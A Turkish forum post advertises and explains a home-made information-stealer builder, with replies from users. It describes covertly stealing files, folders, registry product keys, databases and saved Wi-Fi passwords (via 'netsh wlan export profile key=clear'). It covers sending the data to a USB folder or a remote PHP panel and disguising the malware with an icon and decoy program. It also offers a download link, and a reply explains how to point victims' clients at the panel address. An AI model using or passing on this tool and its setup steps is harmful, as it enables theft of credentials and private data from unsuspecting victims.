Yusefuyn Information Stealer V2.0

Öncelikle Stealer nedir ve ne işe yarar?
Stealer hedef kişinin bilgisayarına erişim kurulduğunda fark ettirmeden veri çalmak için hazırlanmış yazılımlardır.
Veri burada dosya, klasör, bilgi olabilir.
Kendi hazırladığım bu yazılımı ise her türlü veriyi çalmak üzerine geliştirdim.
Programı 3 ana parçada inceleyelim.
İlk olarak kırmızı işaretli kısım çalınacak verileri seçmek ve belirtmek üzerine alandır. Sağ üst tarafta bulunan comboBox vasıtasıyla çalınacak verinin türünü ve ardından solunda bulunan text kutucuğuna tıklayarak hangi veri olduğunu belirtebiliriz.
Başlıca orada bulunan veri türleri nedir
Dosya: Dosya çalmak için.
Klasör: Klasör çalmak için.
WMI: WMI Verilerini çalmak için.(Üzerinde oynanma olmadıysa bilgisayar hakkında en doğru verileri burası sağlıyor.)
Regedit: Kayıt defterindeki verileri çalmak için(Ürün anahtarları vs burada bulunabiliyor.)
SQLQuery: SQL,Access,SQLite,Mysql veri tabanı yönetim sistemlerinden belirli veya belirtilen veritabanı veya kayıtları çalmak için.
ExeParametre: Bu ise bir yazılıma belirli değerler verip çalıştırıldığında ürettiği sonuçları çalmak için. Mesela Cmd'ye systeminfo yazıldığında üretilen sonuçları yada
netsh wlan export profile key=clear yazılarak kayıt edilmiş wlan profillerini
driverquery yazılarak disk bilgilerini çalmak için.
Hedef tipi yazan yeşil ile belirtilmiş alan ise çalınan bilgilerin nereye aktarılacağını belirtiyor. Buradan dosya seçilir ise virüs bulunduğu (flash bellek bunun için biçilmiş kaftan) lokasyon altında Data klasörü altına aktarılıyor.
Panel ise kendi hazırlamış olduğum panel vasıtasıyla uzak sunucu veya bir web site aracılığıyla verileri aktarmak için.
Turuncu alan ise icon belirtme isim yazdırma ve virüsün çalışma esnasında çalıştırılacak programı belirtiyor.
Çalışacak dosyanın virüsünüz ile aynı klasörde belirtiğiniz isim ile olması şart.

Virüs ile beraberinde System.Data.SQLite.dll System.Data.SQLite.xml MySql.Data.dll MySql.Data.xml dosyalarını taşıyın.
PHP Panel kısmında ayar.php dosyasına gerekli veritabanı ve host adını yazmayı unutmayın.
[-] Panel ile çalışılırken klasör verileri aktarılmamaktadır.

İndirme Linki : THTStealer.rar dosyasını indir - download
VirüsTotal : VirusTotal

eline sağlık

eline sağlık

Eline emeğine sağlık .

Elinize sağlık güzel bir yazı olmuş

Eline sağlık.

Eline sağlık.

elinize sağlık

eline saglik anlamadigim birsey var panel bilgilerini nereye giriyoruz builderda? yani client nerden biliyor nereye baglanacagini?

Betrahal' Alıntı:

eline saglik anlamadigim birsey var panel bilgilerini nereye giriyoruz builderda? yani client nerden biliyor nereye baglanacagini?

Genişletmek için tıkla ...

Bağlantı kuruyor denilebilir mi bilmem ama PHP dosyalarını kendi makinanıza yada sunucunuza atıp paylaşıma açtıktan sonra builderde hedef kısmına https://adres/..../veri.php dosyasının adresini veriyorsunuz. Clientler veriyi oraya giriyor.

hedef lokasyon kismi degistirilemiyor. birsey paylasiyonuz eyvallah, bir kontrol edip iyice ondan sonra paylassaniz iyi olur. kimse kontrol etmeyip sadece eline saglik yaziyor.

Betrahal' Alıntı:

hedef lokasyon kismi degistirilemiyor. birsey paylasiyonuz eyvallah, bir kontrol edip iyice ondan sonra paylassaniz iyi olur. kimse kontorl etmeyip sadece eline saglik yaziyor.

Genişletmek için tıkla ...

Hedef lokasyon kısmı dosya ise zaten değiştiremezsin. Panel ise değiştirebilirsin. Oradaki hedef lokasyona bir isim bulamadım bilgi nereye aktarılacağı oradan ayarlanıyor neticede hedeften alacağın bilgiyi hedef lokasyonda bir klasöre koymanın pek anlamı olmadığından hedef olarak dosya seçildiğinde sabit AppStart kalıyor.